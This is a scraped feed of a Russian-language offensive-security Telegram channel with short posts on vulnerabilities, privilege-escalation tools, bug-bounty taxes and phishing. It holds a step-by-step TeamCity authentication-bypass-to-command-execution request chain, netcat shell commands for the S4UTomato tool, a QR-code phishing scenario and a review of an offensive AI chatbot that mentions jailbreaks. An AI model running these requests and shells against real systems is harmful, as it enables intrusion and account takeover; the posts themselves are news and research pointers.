Похек
16.6K subscribers
2.09K photos
110 videos
243 files
3.07K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
DDoS-защиту Cloudflare можно обойти с помощью самой Cloudflare
#xakep #cloudflare

Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare.

💬 Канал | 📡 Хакер | ➡️Более подробная информация
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚13🔥5👾3👍1
Forwarded from Кавычка (Bo0oM)
Снова про #1С

Как пишут в документации: "Внешние обработки представляют собой обработки, которые не входят в состав прикладного решения и хранятся в отдельных файлах с расширением *. epf.".
Так же пишут: "В режиме 1С:Предприятие внешнюю обработку можно запустить на выполнение, открыв ее как любой другой файл, хранящийся на диске."

В правом верхнем углу нажимаем на "бутерброд" -> Файл -> Открыть.

Выбираем наш epf и жмём "ок".
Но только 1С может быть не только под Windows, но и под Linux. Поэтому в коллекцию еще один шелл, который универсальный и под любую операционную систему.

>
❤‍🔥52
Forwarded from Bounty On Coffee
Товарищи багхантеры! Я к вам с хорошими новостями, которые помогут вам сэкономить больше денег с выплат.

Еще в 2020 году, Никита публиковал такую вот хорошие статью: https://habr.com/ru/articles/483082/

Но есть еще нюансы, которые кому-то могут помочь.

Для ИП на УСН для некоторых регионов есть льготы, а именно – это 1% на доход, шикарно же!

В список регионов с таким процентом входят:
- Республика Дагестан
- Мурманская область
- Ненецкая AO

И еще несколько регионов с процентом – 4. Подробная таблица здесь: https://e-kontur.ru/enquiry/276/check_usn

В итоге, если ваши выплаты переваливают за 1 млн рублей и у вас есть возможность оформить ИП в юрисдикции этих регионов, то вперед. Если меньше, то смысла нет, лучше не париться и сидеть на “самозанятом”.

К примеру, если вы получите выплат за 2023 год на 2 млн рублей:
- Самозанятый заплатит – 120к рублей
- ИП на УСН в льготном регионе – фиксированный страховой взнос – 45к, 1% на доход свыше 300к (но тут можно уменьшить это) - 17к и сам налог на доход – 20к = 77к. Чем больше выплат, тем больше экономия.
9
Завтра буду на Mobile Appsec Club ✌🏻

#mobileappsecclub
9🫡6
📣ChatGPT на рыбалке. Выманиваем пароль при помощи QR-кода и чат-бота

ChatGPT сей­час раз­ве что в кот­леты не кла­дут. В этой статье мы рас­ска­жем, как в про­екте по соци­аль­ной инже­нерии с помощью фор­ка биб­лиоте­ки для Gophish рас­сылать QR-коды вмес­то обыч­ных ссы­лок, что­бы вытащить сот­рудни­ков из защищен­ного рабоче­го окру­жения на лич­ные девай­сы. В качес­тве catchy-сце­нария рас­сылки мы рас­смот­рим «Telegram-бот IT-под­дер­жки с ChatGPT» и на самом деле исполь­зуем эту ней­росеть для генера­ции кода бота, а так­же под­клю­чим интегра­цию с API OpenAI для обще­ния с поль­зовате­лями.

#xakep #chatgpt

💬 Канал | 📶 Хакер
Please open Telegram to view this post
VIEW IN TELEGRAM
👍82
135🔥1
Похек
Photo
Стендап по ИБ

#mobileappsecclub
😎21🌚3
Forwarded from Monkey Hacker
Token that gives me power

Наверно кто-то слышал про новую проблему в JetBrains TeamCity, связанная с RPC2

В целом стоит начать, что TeamCity используется для автоматизированной сборки и тестирования ПО. А он написан на Java

Ребята нашли интересный дифф в методе XmlRpcController.getPathSuffix. Точнее был прикол, связанный с wildcard path. Плюс TeamCity использует фреймворк Spring, а там существует интерцептор, который позволяет модифицировать входящие HTTP-запросы (thx to riven). По этим и другим причинам, любой входящий HTTP-запрос, имеющий путь /**/RPC2, не будет подвергаться проверке аутентификации. А значит мы можем использовать API-ручки для получения токенов почти любых пользователей и для дальнейшего создания собственного юзера.

/app/rest/users/<userLocator>/tokens/<tokenName>

Отсюда мы имеем следующий сценарий

Получаем токен администратора

POST /app/rest/users/id:1/tokens/RPC2

С его помощью, мы теперь можем создать пользователя с админскими правами

POST localhost:8111/app/rest/users -H "Content-Type: application/json" --data "{\"username\": \"monkey1\", \"password\": \"monkey\", \"email\": \"monkey\", \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}}" -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.eWaBWGhGSFBZVHB4WvAxNEptVmhQUkkxN0VF.MjhmYTY2MjUtNjZhNy00OTQ0LTk4LmItYzI1N2Q3MjIwMzE2"

Но, мы можем пойти дальше и докрутить до RCE. Первым делом включаем дебаг (токен здесь также потребуется)

POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=true

Не забываем все это применить к текущему конфигу

POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties

И теперь мы имеем возможность исполнять команды

POST /app/rest/debug/processes?exePath=id


Не забываем удалять токен

DELETE /app/rest/users/id:1/tokens/RPC2
👍431🔥1
💣 Chat WhiteHat

Я думаю многие из вас слышали о WormGPT, которая не продолжительное время была на хайпе. В основе у неё была GPT-J 6B model, а автор переучил нейросеть, чтобы она выдавала запрещеку, так сказать. Но как хайп ушёл, большинство забыло про эту нейронку, да и цены от 500 до 5к вечнозеленых кусаются. Но сегодня чисто случайно в перерыве между работой и работой нашёл новую нейросеть, нацеленную на offensive security.

🛡 Рега простая, есть бесплатный тестовый период, но всё равно требует ввести валидную банковскую карту для тестового платежа. У меня списало 0.00 USD, так что наличие даже пол бакса на карте будет достаточно. Есть ограничение в 10к токенов, но я уже довольно много запросов вводил, тратиться в среднем по 15 токенов. Следовательно вам хватит примерно на 666 запросов. Далее либо надо платить, либо новый акк.

💸 Цены 28$ за базовую версию с 10к токенов, далее Super за 38$ и уже даётся 20к и доступ ко всем функциям (какие есть ещё помимо AI и leaked check не знаю) и финальная White Hat за 48$ с 30к токенов. Количество токенов обновляется каждый месяц. Запросы строятся похожим образом, как в ChatGPT, но jailbreak'и ему давать бессмысленно, она зависает. Также эмпирическим методом выявил, что просить сгенерировать и обфусцировать payload'ы - плохая идея, т.к. он просто ставит эмодзи+тот же самый payload. Ответы генерируются достаточно медленно, в раза 2 дольше, чем ChatGPT 4 или Claude.

📌 На мой взгляд потестить её можно для рабочих задач. Но полагаться на работоспособность кода или информации не стоит, также как и на ChatGPT 4. Плюсами нейросети является условная бесплатность нейросети, податливость при любых запросах и функция проверки попадала ли ваша почта в слитые БД.

(Я случайно сломал её и теперь она не реагирует на мои запросы))) Это натолкнуло на мысль, что это ChatGPT 4+грамотный промт, т.к. я дал свой jailbreak и оно сломалось)

😬 Потыкать нейросеть

#ai #chatgpt #offensive

💬 Канал | 📶 Whitehat AI
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍31
S4UTomato
#LPE #windows

Инструмент позволяющий выполнить повышение привилегий через Kerberos. Но главное отличие в том, что данный метод, хоть и схож с ранее известными методами privesc из семейства "Potato", но вместо использования COM-интерфейсов, здесь используется расширение S4U для получения билета службы для учетной записи администратора домена на локальной машине. Затем этот билет используется для создания системной службы и получения SYSTEM. Данный инструмент сочетает в себе сразу 3 техники:
1. LEP via Resource-based Constrained Delegation (ссылка)
S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"

2. LEP via Shadow Credentials + S4U2self (ссылка)
S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f

3. LEP via Tgtdeleg + S4U2self (ссылка)
# First retrieve the TGT through Tgtdeleg
S4UTomato.exe tgtdeleg
# Then run SCMUACBypass to obtain SYSTEM privilege
S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"

💻 Github repo

💬 Канал
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
Давайте поможем коллеге набрать 1.500 подписчиков и больше!
Там вы сможете почитать интересное про Mobile Pentest + Mobile AppSec
@pntests
👍91
🔼🔽Небезопасная многопоточность или Race Condition
#bugbounty #pentest #web

Как я и люблю - мы начнем с условных основ и будем двигаться постепенно всё глубже и глубже. Ближе к концу разберём, как эксплуатировать. При написании статьи было использовано много разных источников. К чему это? А к тому, что я начну со слов, которые нашел в статье у Бума - про него будет дальше. Что ж, приятного чтения.
Race condition (состояние гонки) - это ситуация, при которой несколько потоков (или процессов) одновременно пытаются выполнить операции чтения или записи к общим ресурсам без должной синхронизации. Представить можно в формате очереди, один за одним.

⚡️ Статья на Habr | 🛡 Дневник Безопасника
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥101😎1
Forwarded from APT
🥔 Coerced Potato

New tool for local privilege escalation on a Windows machine, from a service account to NT SYSTEM. Should work on any recent versions of Windows.

⚙️ Tool:
https://github.com/hackvens/CoercedPotato

📝 Research:
https://blog.hackvens.fr/articles/CoercedPotato.html

#windows #lpe #seimpersonateprivilege #potato
🔥7👍21
Forwarded from SHADOW:Group
​​📝Немного про шаблоны для BCheck

Решил на днях собрать свою коллекцию шаблонов для BCheck. Если вдруг еще не познакомились с этим функционалом в Burp Suite, то вот неплохая статья, чтобы быстро вкатиться.

И дыбы не выдумывать велосипед, решил посмотреть уже готовые шаблоны в открытом доступе и, к моему счастью, нашелся репозиторий, в котором уже собрана целая подборка.

Бегло прошерстив ее, выделил для себя примерный план того, что нужно написать самостоятельно, а что можно позаимствовать или внести небольшие коррективы.

Например шаблон, для Blind SSRF смотрит только параметры url и proxy. Мы же в свою очередь можем добавить и другие популярные параметры и повысить свои шансы на успех. Или, например, добавить больше проверок в шаблон для crlf. В общем, проявите фантазию и однажды это принесет свои плоды.

Ссылка на GitHub

#web #tools #burp
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤‍🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
1-Click RCE on GNOME (CVE-2023-43641)
#RCE #linux #gnome #cve

Сегодня, в сотрудничестве с Ильей Липницким, Лаборатория безопасности GitHub раскрывает CVE-2023-43641, уязвимость memory corruption в libcue. Мы также отправили текстовую версию этой записи в список oss-security list.

🖥 Статья | 🛡 Дневник Безопасника
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🆒1